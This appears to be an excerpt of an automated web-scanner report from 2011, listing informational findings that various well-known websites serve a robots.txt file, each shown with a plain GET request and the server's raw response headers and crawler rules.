24.826. http://www.ticketmaster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketmaster.com

Response

HTTP/1.0 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT
ETag: "646-b383d900"
Accept-Ranges: bytes
Content-Length: 1606
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:53 GMT
Connection: close
Set-Cookie: SID=rlh4YCoxj0U_O4ISF3i1y9JvbOTX8T2XK8T8oEEMbH9ON5iRw1w4YNAPcO3TraAhwbpWYfY8HXNSsJUl; path=/; domain=.ticketmaster.com
Set-Cookie: BID=TkLyo5K0tLLLt_lIMIZAGi4zaH9Y8HBLySNrKXhBjePRLrVgFOYNCpUYiuS_T-uDHpVj9XC45W6lyKuLQCox; path=/; domain=.ticketmaster.com; expires=Fri, 01-Jan-2038 00:00:01 GMT
Set-Cookie: CMPS=SURtPQog9ZpYFZWwrTZmQ1zsWmM4s1z9tP8PaCxC9HGVKmn20GsIkg==; path=/

User-agent: *
Disallow: /seatingchart
Disallow: /change_area
Disallow: /find_area
Disallow: /error
Disallow: /cgi/outsider.plx
Disallow: /cgi/sfxoutsider.plx
Disallow: /cgi/tt.plx
Disallow: /healthche
...[SNIP]...
24.827. http://www.tickets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tickets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tickets.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 11:53:24 GMT
Server: Apache
Last-Modified: Thu, 04 Nov 2010 23:25:07 GMT
ETag: "ae9ef-68a-4cd340d3"
Accept-Ranges: bytes
Content-Length: 1674
Content-Type: text/plain
Age: 8528
X-Cache: HIT from lxweb8.back.tickets.com
Connection: close

User-agent: *
Disallow: /

User-agent: Googlebot
Disallow: /demo/
Disallow: /scripts/
Disallow: /styles/

User-agent: Googlebot-Image
Disallow: /

User-agent: bingbot
Disallow: /demo/
Disallow: /scrip
...[SNIP]...
24.828. http://www.ticketsnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketsnow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketsnow.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 1284
Content-Type: text/plain; charset=utf-8
Last-Modified: Sat, 02 Apr 2011 14:02:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CUR PSA OUR IND INT"
X-Powered-By: ASP.NET
Set-Cookie: TNOW3SessionCookie=976320910#a08f46cc-9c82-4e39-8027-a4e44688354d; expires=Mon, 02-Apr-2012 14:02:54 GMT; path=/
X-Header-Removed-1: ETag
Date: Sat, 02 Apr 2011 14:02:54 GMT
Connection: keep-alive


# This robots.txt is generated by Robots.aspx.
User-agent: *
Disallow: /SellYourTicketsNow/
Disallow: /search/
Disallow: /test/
Disallow: /order/
Disallow: /secureorder/
Disallow: /check
...[SNIP]...
24.829. http://www.tigerdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Fri, 24 Jul 2009 20:02:38 GMT
Accept-Ranges: bytes
ETag: "a3c6d8b199cca1:103ea"
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:17 GMT
Connection: close

# Allow all

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgisec/
Disallow: /profiles/
Disallow: /email/
24.830. http://www.time.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.time.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.time.com

Response

HTTP/1.1 200 OK
Server: Undisclosed-Webserver/0.1
Date: Sat, 02 Apr 2011 13:24:06 GMT
Content-type: text/plain
Set-Cookie: PFUID=40ec37ca4d97237660041001ffffff9d; path=/; domain=.time.com; expires=Tue, 01-Jan-2035 00:00:00 GMT
Last-modified: Wed, 19 Aug 2009 14:07:44 GMT
Content-length: 1738
Accept-ranges: bytes
Connection: close

# Welcome to Pathfinder's robots.txt
#
# If you have any questions about indexing our site,
# especially regarding more efficient or convenient
# methods, please write to:
#
#
...[SNIP]...
24.831. http://www.timeanddate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeanddate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timeanddate.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:59 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 09 Dec 2010 08:58:26 GMT
ETag: "2db191e-1b48-496f670d57080"
Accept-Ranges: bytes
Content-Length: 6984
Content-Type: text/plain
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

# http://web.nexor.co.uk/mak/doc/robots/norobots.html
#

User-agent: MSIECrawler
Disallow: /

User-agent: PortalBSpider
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

User-agent: ScoutJet

...[SNIP]...
24.832. http://www.timewarnercable.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timewarnercable.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timewarnercable.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 208
Content-Type: text/plain
Last-Modified: Thu, 16 Dec 2010 04:24:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:55 GMT
Connection: close

# /robots.txt file for http://www.timewarnercable.com/

User-agent: *
Disallow: /model/
Disallow: /carolinasmodel/
Disallow: /sandiegomodel/
Disallow: /test/
Disallow: /Test/
Disallow: /util/
Disallow
...[SNIP]...
24.833. http://www.tinypic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinypic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tinypic.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:28 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 23 Sep 2008 15:59:12 GMT
ETag: "4d-3fad3400"
Accept-Ranges: bytes
Content-Length: 77
Age: 1157
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq04:80 (squid)

User-agent: *
Disallow: /language.php
Disallow: /track.php
Disallow: /ad.php
24.834. http://www.tmz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Set-Cookie: phpsessionid=fltn4m5v67qnf7k87jdps94fp7; expires=Mon, 04-Apr-2011 12:43:29 GMT; path=/; domain=www.tmz.com
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 12:43:29 GMT
Vary: Accept-Encoding
Content-Length: 1000
Connection: close
Content-Type: text/plain; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private


User-agent: *
Disallow: /*?action=print
Disallow: */third_rail_rework
Disallow: */digitalsmiths_demo_environment
Disallow: */video_demo
Disallow: */tmz_dev_demo
Disallow: */test_page
Disallow: */test
...[SNIP]...
24.835. http://www.tomshardware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomshardware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tomshardware.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 13:57:11 GMT
ETag: "569357-71a-49fc7ab793bc0"
Accept-Ranges: bytes
Content-Length: 1818
Vary: Accept-Encoding
Content-Type: text/plain
X-Cache: MISS from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: close

#presence-pc
Sitemap: http://www.presence-pc.com/forum/sitemap-index.php?config=presencepc.inc&num=10000

#tomshardware

Sitemap: http://www.tomshardware.com/forum/sitemap-index.php?config=tomshardwar
...[SNIP]...
24.836. http://www.topix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topix.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:24:19 GMT
Server: Apache
P3P: policyref="http://topix.cachefly.net/static/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND ONLo UNI COM NAV INT DEM STA"
X-TALXX: 2.88
Cache-Control: private, max-age=31536000
Last-Modified: Fri, 27 Oct 2006 12:00:00 GMT
Expires: Sun, 01 Apr 2012 13:24:19 GMT
ETag: "robots.1.txt"
Content-Length: 2465
Connection: close
Content-Type: text/plain
X-TPBI: 23350 003106192168 0.0050 0.0051

# Topix Robots.txt
# SYSTEM OK
User-agent: *
Disallow: /search/
Disallow: /redir/
Disallow: /r/
Disallow: /feedback/
Disallow: /iframe/
Disallow: /bin/
Disallow: /t6track/
Disallow: /pics/
Disallow: /
...[SNIP]...
24.837. http://www.topix.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topix.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topix.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:07 GMT
Server: Apache
P3P: policyref="http://topix.cachefly.net/static/p3p.xml", CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND ONLo UNI COM NAV INT DEM STA"
X-TALXX: 4.09
Cache-Control: private, max-age=31536000
Last-Modified: Fri, 27 Oct 2006 12:00:00 GMT
Expires: Sun, 01 Apr 2012 13:46:07 GMT
ETag: "robots.1.txt"
Content-Length: 2465
Connection: close
Content-Type: text/plain
X-TPBI: 23350 003182192168 0.0127 0.0128

# Topix Robots.txt
# SYSTEM OK
User-agent: *
Disallow: /search/
Disallow: /redir/
Disallow: /r/
Disallow: /feedback/
Disallow: /iframe/
Disallow: /bin/
Disallow: /t6track/
Disallow: /pics/
Disallow: /
...[SNIP]...
24.838. http://www.topshareware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.topshareware.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.topshareware.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 01 Dec 2009 11:14:54 GMT
Accept-Ranges: bytes
ETag: "4a163827772ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:17 GMT
Connection: close
Content-Length: 1786

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /redirect.aspx
Disallow: /downloads.aspx
Disallow: /download.aspx
Disallow: /buy.aspx
Disallow: /search.aspx
Disallow: /*?
...[SNIP]...
24.839. http://www.toptenreviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toptenreviews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:39 GMT
Server: Apache
Last-Modified: Tue, 10 Nov 2009 15:15:58 GMT
ETag: "6a4a0e-19-47805c985c780"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8


User-Agent: *
Allow: /
24.840. http://www.totalbeauty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalbeauty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.totalbeauty.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 05:19:58 GMT
Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT
Accept-Ranges: bytes
Content-Length: 121
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
_onnection: keep-alive
Via: CN-5000
Set-Cookie: cresist=43C93BCA00001F90; path=/
Connection: close

User-agent: *
Disallow: /typo3conf/
Disallow: /typo3_src-4.1.1/
Disallow: /fileadmin/
Disallow: /t3lib/
Disallow: /func/
24.841. http://www.townhall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.townhall.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:23 GMT
Connection: close
Content-Length: 67

User-agent: *
Disallow: /issues/issue.aspx
Disallow: /gatekeeper/
24.842. http://www.toyota.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toyota.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Sep 2010 18:55:40 GMT
ETag: "4af0-264-ecc46300"
Accept-Ranges: bytes
Content-Length: 612
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:50:26 GMT
Connection: close

User-agent: *
Disallow: /images/
Disallow: /includes/
Disallow: /javascript/
Disallow: /ofsc/
Disallow: /tma/
Disallow: /toyota/html/
Disallow: /swfs/
Disallow: /yarisvsyaris/
Disallow: /flas
...[SNIP]...
24.843. http://www.toysrus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toysrus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toysrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:24 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Sat, 29 Nov 2008 04:25:07 GMT
ETag: "540e73-17d-45ccc5ccf0ec0"
Accept-Ranges: bytes
Content-Length: 381
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:32:24 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /cart/
Disallow: /reviews/
Disallow: /coreg/
Disallow: /fsrscripts/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /ControllerServlet/
Disallow: /ema
...[SNIP]...
24.844. http://www.trafficrevenue.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trafficrevenue.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trafficrevenue.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:24:03 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "50-4af30a44-0"
Last-Modified: Thu, 05 Nov 2009 17:24:20 GMT
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=30, public

User-agent: *
Allow: /

Sitemap: http://www.trafficrevenue.net/sitemap.xml.gz
24.845. http://www.trails.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trails.com

Response

HTTP/1.0 200 OK
Content-Length: 132
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 01:15:56 GMT
Accept-Ranges: bytes
ETag: "abf67b28782cb1:4c9b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:43 GMT
Connection: close

User-agent: *
Disallow: /cms/search.aspx
Disallow: /forums/
Disallow: /mytrails/
Sitemap: http://www.trails.com/sitemapindex.xml
24.846. http://www.travel-ticker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travel-ticker.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=941D0154378F9818A2B5697156633036; Path=/
Set-Cookie: SaneID=941D0154378F9818A2B569715663303; Expires=Sun, 06-Mar-2016 14:16:41 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"64-1300925852000"
Last-Modified: Thu, 24 Mar 2011 00:17:32 GMT
Content-Type: text/plain
Content-Length: 64
Date: Sat, 02 Apr 2011 14:16:41 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c4645525d5f4f58455e445a4a422d6d;path=/;httponly

# Robots.txt

User-agent: *
Disallow: /details.jsp?actionType=1
24.847. http://www.travelocity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelocity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:08 GMT
Server: Apache
Set-Cookie: TVLY_GEO=|||||; path=/; domain=.travelocity.com; expires=Sat, 02-Apr-2011 16:28:08 GMT
Set-Cookie: tyrg1st=82141B20294E07DE; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.travelocity.com
Last-Modified: Tue, 24 Mar 2009 04:53:23 GMT
ETag: "43"
Accept-Ranges: bytes
Content-Length: 67
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /travelagency/
Disallow: /site/find/World/
24.848. http://www.travelpod.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelpod.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.travelpod.com/siteindex.xml.gz
User-agent: *
Disallow: /akamai/
Disallow: /cgi-bin/accommodations-reviews.pl
Disallow: /cgi-bin/add_fav.cgi
Disallow: /cgi-bin/admin.pl
Disallow: /c
...[SNIP]...
24.849. http://www.travelzoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelzoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelzoo.com

Response

HTTP/1.0 200 OK
Content-Length: 1235
Content-Type: text/plain
Content-Location: http://www.travelzoo.com/robots.txt
Last-Modified: Thu, 30 Sep 2010 16:59:38 GMT
Accept-Ranges: bytes
ETag: "0f9b7ddc060cb1:2964"
Server: Microsoft-IIS/6.0
X-IP: 40
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:32:46 GMT
Connection: close

User-agent: *
Disallow: /SuperSearchAjaxPages/
Disallow: /supersearchajaxpages/
Disallow: /destinations/preview/
Disallow: /Redirect.ashx
Disallow: /GeoDataAutocompleteHandler.ashx
Disallow: /su
...[SNIP]...
24.850. http://www.trendmicro.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trendmicro.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trendmicro.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
p3p: CP="NON DSP COR CUR CON TEL OUR OTR IND", policyref="http://www.trendmicro.com/w3c/p3p.xml"
nnCoection: close
Content-Type: text/plain
Last-Modified: Thu, 03 Apr 2008 09:01:11 GMT
ETag: "e579a7436995c81:14a0"
ntCoent-Length: 1273
Cache-Control: private, max-age=616045
Date: Sat, 02 Apr 2011 13:57:35 GMT
Content-Length: 1273
Connection: close

User-agent: gwm-gsa-crawler
Disallow: /_private/
Disallow: /banners/
Disallow: /cgi-bin/
Disallow: /channel/
Disallow: /channels/
Disallow: /housecall/
Disallow: /images/
Disallow: /logs/
Dis
...[SNIP]...
24.851. http://www.tripadvisor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tripadvisor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:18 GMT
Server: Apache
Set-Cookie: v1st=10C5B66BCFB983BD; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.tripadvisor.com
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TAUnique=%1%enc%3AvNugZEVLWFhd8LGI8QbYY0XbcR4szT2Mg7qfRf7ZLG8qtsCUykBtEA%3D%3D; Domain=.tripadvisor.com; Expires=Tue, 30-Mar-2021 12:43:18 GMT; Path=/
Set-Cookie: ServerPool=X; Domain=.tripadvisor.com; Path=/
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /AccountManagement
Disallow: /ActionRecord
Disallow: /AddForumUser
Disallow: /AddUrl
Disallow: /AdServlet
Disallow: /AffiliateWidgets
Disallow: /AirlineRatingCreate
Disallow: /
...[SNIP]...
24.852. http://www.tripzen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripzen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tripzen.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 14:09:01 GMT
Content-Type: text/plain
Content-Length: 1521
Last-Modified: Sat, 21 Aug 2010 00:09:50 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Googlebot
Disallow: /celebrity/*/talk
Disallow: /celebrity/*/fans
Disallow: /celebrity/*/quizzes
Disallow: /celebrity/*/videos
Disallow: /celebrity/*/photos
Disallow: /movie/*/fans
Disallo
...[SNIP]...
24.853. http://www.true.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.true.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.true.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 21 Jan 2010 19:07:09 GMT
Accept-Ranges: bytes
ETag: "c7cfeecc9aca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:40 GMT
Connection: keep-alive
Content-Length: 139
Set-Cookie: NSC_xxx-mc-hsq=445337273660;path=/;domain=true.com

User-agent: *
Disallow: /includes/
Disallow: /ajaxpro/
Disallow: /scripts/
Disallow: /styles/
Sitemap: http://www.true.com/Sitemap.xml
24.854. http://www.trulia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trulia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trulia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 22:59:54 GMT
ETag: "18712cc8-7bc-49fbb2289ce80"
ntCoent-Length: 1980
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:35:54 GMT
Content-Length: 1980
Connection: close
Cache-Control: private

User-agent: *
Disallow: /slp/
Disallow: /include/
Disallow: /templates/
Disallow: /new_templates/
Disallow: /templates_save/
Disallow: /leave_feedback/
Disallow: /pictures/
Disallow: /images/
Disallo
...[SNIP]...
24.855. http://www.truste.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truste.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truste.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:08 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Last-Modified: Thu, 31 Mar 2011 21:48:51 GMT
ETag: "1ae03d-2fa-49fce4248f6c0"
Accept-Ranges: bytes
Content-Length: 762
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /about/
Disallow: /assets/
Disallow: /channel/
Disallow: /channel_materials/
Disallow: /common/
Disallow: /eloqua/
Disallow: /elqNow
Disallow: /forms/
Disallow: /fundraising/
D
...[SNIP]...
24.856. http://www.tv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:35 GMT
Server: Apache
Last-Modified: Fri, 18 Feb 2011 22:41:50 GMT
Accept-Ranges: bytes
Content-Length: 475
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: text/plain

# robots.txt for http://www.tv.com/

User-agent: *
Disallow: /users/
Disallow: /*get_items_for_tag
Disallow: /moderator-hangout/
Disallow: /usersubmission/
Disallow: /*action=abuse

#new for TVPROD-28
...[SNIP]...
24.857. http://www.tvguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvguide.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Nov 2010 00:05:15 GMT
ETag: "ffe4281e3481cb1:1a2d"
Server: Microsoft-IIS/6.0
P3P: policyref=" /w3c/p3p.xml", CP="CAO PSA OUR BUS"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:54 GMT
Content-Length: 2206
Connection: close

# www.tvguide.com: robots.txt

User-agent: Googlebot
Disallow: /fap/
Disallow: /search/
Disallow: /Support/
Disallow:/*rss
Disallow:/*partnerid
Disallow:/*profileid
Disallow: /detail/detail_l
...[SNIP]...
24.858. http://www.tvtxtr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvtxtr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvtxtr.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 21 Sep 2010 00:48:39 GMT
Accept-Ranges: bytes
ETag: "b1ee64bb2659cb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 14:16:50 GMT
Connection: close
Content-Length: 201
Set-Cookie: BIGipServerpool-173.203.135.154-TVT-WWW=2684463296.20480.0000; path=/

User-Agent: *
Disallow: /config/
Disallow: /handlers/
Disallow: /includes/
Disallow: /interceptors/
Disallow: /layouts/
Disallow: /logs/
Disallow: /model/
Disallow: /plugins/
Disallow: /views/
Allow:
...[SNIP]...
24.859. http://www.ucomparehealthcare.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucomparehealthcare.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ucomparehealthcare.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:08 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Last-Modified: Fri, 28 Jan 2011 19:59:13 GMT
ETag: "11ad2fd4a-c77-49aed800b6640"
Accept-Ranges: bytes
Content-Length: 3191
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=44
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /6/ad/test.html

User-agent: *
Disallow: /marketing/

User-agent: *
Disallow: report.html

User-agent: *
Disallow: report2.html

User-agent: *
Disallow: /drs/report2.html

User
...[SNIP]...
24.860. http://www.ufc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ufc.com

Response

HTTP/1.0 200 OK
